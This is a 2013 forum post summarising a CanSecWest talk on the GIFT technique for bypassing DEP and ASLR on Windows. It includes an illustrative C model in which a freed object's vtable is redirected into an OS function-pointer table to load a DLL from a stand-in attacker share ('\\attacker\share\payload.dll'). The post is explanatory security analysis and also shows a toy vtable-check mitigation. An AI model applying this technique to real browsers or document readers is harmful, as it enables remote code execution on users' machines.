DEP ASLR bypass without ROP JIT : CanSecWest2013 Slides and Analysis
03-08-2013, 06:03 AM
I have my own CanSecWest talk to blog about, but this one is more interesting and was the most awaited of the conference, so here are the slides; I will add my own analysis and test cases to this entry later. Interestingly, we had this very technique discussed on Garage back in November: http://www.garage4hackers.com/f22/wi...innu-3080.html
Yu Yang (@tombkeeper) demoed the technique on MS13-008, and his ASLR/DEP bypass does not need a heap spray at all. The exploit is scary: a quick kaboom, without a heap spray.
He calls the method GIFT (Got It From a Table).
The trick is simple: overwrite the freed object's vtable pointer so that it points into Wow64SharedInformation, the array of 32-bit ntdll function pointers that the kernel exposes in the SharedUserData page (0x7FFE0000). That page sits at the same address in every 32-bit process on x64 Windows, so no info leak is needed and ASLR does not matter; and because the virtual call lands in a legitimate ntdll routine (LdrHotPatchRoutine, which loads a DLL from a path supplied in its argument, for example a UNC path on an attacker's SMB share), nothing ever executes from attacker-controlled memory and DEP never comes into play. The object's own body is what gets parsed as that argument, which is why the exploit needs neither shellcode nor ROP, and why a file sharing server appears in the requirements below.
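To make the idea concrete, here is a small C model of the primitive, added as an illustration; it is not tombkeeper's code and not taken from the slides. The table `g_shared_table`, the routine `sys_load_from_descriptor`, the object layout and the UNC path are all stand-ins constructed for the example: they play the roles of Wow64SharedInformation, LdrHotPatchRoutine, the freed object and the attacker's share, but do not reproduce the real structures or calling conventions.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Every "method" and every OS routine in this model takes one pointer,
 * the way a virtual call hands the callee the object it is invoked on. */
typedef void (*vfn_t)(void *arg);

/* A C++-style object: vtable pointer first, instance data after it. */
typedef struct {
    vfn_t *vtable;
    char   data[56];
} obj_t;

/* --- the legitimate class --------------------------------------------- */
static void obj_query(void *self)   { (void)self; }
static void obj_release(void *self) { (void)self; }
static vfn_t g_obj_vtable[] = { obj_query, obj_release };
enum { SLOT_RELEASE = 1 };

/* --- the OS side -------------------------------------------------------- */
static char g_last_loaded[128];   /* last module path the "loader" saw */

/* Stand-in for an OS routine that reads a module path out of a caller-
 * supplied descriptor and loads it (the role LdrHotPatchRoutine plays in
 * the real technique). Constructed for this example. */
static void sys_load_from_descriptor(void *desc)
{
    const char *path = (const char *)desc + sizeof(vfn_t *);  /* skip header word */
    snprintf(g_last_loaded, sizeof g_last_loaded, "%s", path);
}
static void sys_other(void *arg) { (void)arg; }

/* Stand-in for a table of OS function pointers at an address the attacker
 * knows without any info leak (SharedUserData!Wow64SharedInformation in
 * the real technique). Constructed for this example. */
static vfn_t g_shared_table[] = { sys_other, sys_other, sys_load_from_descriptor, sys_other };
enum { SHARED_LOAD_SLOT = 2 };

/* The vulnerable call site: a virtual call on an object that was freed
 * and refilled by the attacker before this runs. */
static void dangling_release(obj_t *p) { p->vtable[SLOT_RELEASE](p); }

/* Constructed attacker input: where the payload DLL is served from. */
static const char k_unc_path[] = "\\\\attacker\\share\\payload.dll";

/* Fill the freed object's memory the way GIFT needs it. */
static void build_fake_object(obj_t *fake)
{
    memset(fake, 0, sizeof *fake);
    /* Choose the vtable base so that SLOT_RELEASE indexes the loader entry
     * of the shared table: no shellcode, no pivot, no gadget chain. */
    fake->vtable = &g_shared_table[SHARED_LOAD_SLOT - SLOT_RELEASE];
    /* The object body doubles as the loader's descriptor: the path to load. */
    snprintf(fake->data, sizeof fake->data, "%s", k_unc_path);
}

/* Run the attack; returns the path the loader was asked for. */
const char *gift_exploit(void)
{
    obj_t fake;
    g_last_loaded[0] = '\0';
    build_fake_object(&fake);
    dangling_release(&fake);
    return g_last_loaded;
}

/* Baseline: the same call on an intact object loads nothing ("" returned). */
const char *benign_release(void)
{
    obj_t real = { g_obj_vtable, "" };
    g_last_loaded[0] = '\0';
    dangling_release(&real);
    return g_last_loaded;
}

/* The check a vtable-integrity mitigation would make before dispatching:
 * does the vtable pointer fall inside a region that holds OS data rather
 * than a class vtable? Returns 1 if so. */
int vtable_in_shared_table(const obj_t *p)
{
    uintptr_t v  = (uintptr_t)p->vtable;
    uintptr_t lo = (uintptr_t)g_shared_table;
    uintptr_t hi = lo + sizeof g_shared_table;
    return v >= lo && v < hi;
}

/* Builds the attacker's object and runs the check against it. */
int fake_object_flagged(void)
{
    obj_t fake;
    build_fake_object(&fake);
    return vtable_in_shared_table(&fake);
}

int main(void)
{
    printf("loader asked for: %s\n", gift_exploit());
    printf("flagged by vtable check: %d\n", fake_object_flagged());
    return 0;
}
```

The point to take away is the aliasing: one block of attacker bytes serves as both the fake vtable holder (first word) and the argument the OS routine parses (the rest), and the only "code" involved belongs to the OS. The range check at the end is the kind of test a vtable-validation mitigation can apply before dispatch; in the real case the suspicious range would be the SharedUserData page rather than a local array.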
Here are a couple of quick notes on the bypass technique, from the slides.
Good news about the technique:
- Totally ASLR/DEP free
- Language/SP independent
- Works on almost all use-after-free / vtable-overflow bugs
- Targets IE, Firefox, PDF readers, Flash, Office …
- Even doesn't need shellcode
- Sometimes doesn't need a heap spray
And the caveats:
- Needs a Windows file sharing server
  - It is not a real problem
- Only works on 32-bit processes on x64 Windows
  - This situation is very common
- Cannot work on Windows 8
The documents and presentation are from Yu Yang (@tombkeeper). Download the slides from here:
https://docs.google.com/file/d/0B46U...it?usp=sharing
Cheers.